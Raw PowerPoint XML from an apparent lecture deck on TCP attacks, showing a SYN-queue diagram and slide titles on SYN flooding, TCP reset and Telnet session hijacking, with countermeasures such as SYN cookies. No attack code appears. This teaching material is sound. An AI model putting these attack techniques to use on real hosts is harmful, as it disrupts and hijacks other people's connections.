            <a:off x="6784533" y="1832099"/>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sIP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7463203" y="1833200"/>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sIP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135313" y="1821147"/>
            <a:ext cx="565746" cy="98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sIP1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8141890" y="1605131"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7439094" y="1606229"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756032" y="1607325"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6098192" y="1608425"/>
            <a:ext cx="679783" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5428287" y="1609522"/>
            <a:ext cx="679783" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6651873" y="1282790"/>
            <a:ext cx="1257572" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN queue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210267" y="3337971"/>
            <a:ext cx="1440673" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>No ACK back?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1309108" y="3282633"/>
            <a:ext cx="1532771" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0"/>
              <a:t>retransmission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2427436" y="3491859"/>
            <a:ext cx="782831"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82629" y="3822060"/>
            <a:ext cx="5338857" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SEED Ubuntu has 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>retrans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Retrans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> makes the connection record stay long in SYN queue </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3079792" y="3078699"/>
            <a:ext cx="2176363" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>  Half-open connection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067902" y="4212379"/>
            <a:ext cx="1901163" cy="6578"/>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69224" y="3899641"/>
            <a:ext cx="1839758" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1309108" y="3822060"/>
            <a:ext cx="1005921" cy="6701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444171" y="3899641"/>
            <a:ext cx="1075363" cy="6651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5885543" y="2828717"/>
            <a:ext cx="892432" cy="130059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80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14445</TotalTime>
  <Words>3474</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>392</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 Theme</vt:lpstr>
      <vt:lpstr>TCP  Attacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Review on TCP Packet Header </vt:lpstr>
      <vt:lpstr>Flag bits(URG | ACK | PSH | RST | SYN | FIN) </vt:lpstr>
      <vt:lpstr>TCP 3-way Handshake Protocol</vt:lpstr>
      <vt:lpstr>TCP 3-way Handshake Protocol (more details) </vt:lpstr>
      <vt:lpstr>TCP 3-way Handshake Protocol (more details) </vt:lpstr>
      <vt:lpstr>SYN Flooding Attack</vt:lpstr>
      <vt:lpstr>Analysis</vt:lpstr>
      <vt:lpstr>SYN Flooding Attack – using c program</vt:lpstr>
      <vt:lpstr>SYN Flooding Attack – using c program</vt:lpstr>
      <vt:lpstr>If experiment fails (legal user still can login after server is attacked),…</vt:lpstr>
      <vt:lpstr>SYN Flooding Attack – using Python program</vt:lpstr>
      <vt:lpstr>Countermeasure:  vulnerability from SYN queue </vt:lpstr>
      <vt:lpstr>Server does not save the client information </vt:lpstr>
      <vt:lpstr>If client sends ACK only</vt:lpstr>
      <vt:lpstr>Countermeasure: compute y secretly</vt:lpstr>
      <vt:lpstr>Attacker can not succeed</vt:lpstr>
      <vt:lpstr>TCP Reset Attack</vt:lpstr>
      <vt:lpstr>TCP Reset Attack</vt:lpstr>
      <vt:lpstr>TCP Reset Attack: Automatic Python Program</vt:lpstr>
      <vt:lpstr>TCP Session Hijacking Attack</vt:lpstr>
      <vt:lpstr>TCP Session Hijacking Attack: Sequence Number</vt:lpstr>
      <vt:lpstr>Hijacking a Telnet Connection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Telnet Protocol</vt:lpstr>
      <vt:lpstr>Print to attacker’s screen</vt:lpstr>
      <vt:lpstr>Launch the TCP Session Hijacking Attack</vt:lpstr>
      <vt:lpstr>Launch the TCP Session Hijacking Attack</vt:lpstr>
      <vt:lpstr>Spoofing for hijacking (hijack_auto.py)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on the TCP Protocol</dc:title>
  <dc:creator>Jiang</dc:creator>
  <cp:lastModifiedBy>rahul manjinder</cp:lastModifiedBy>
  <cp:revision>389</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-10T00:12:47Z</dcterms:modified>
</cp:coreProperties>
</file>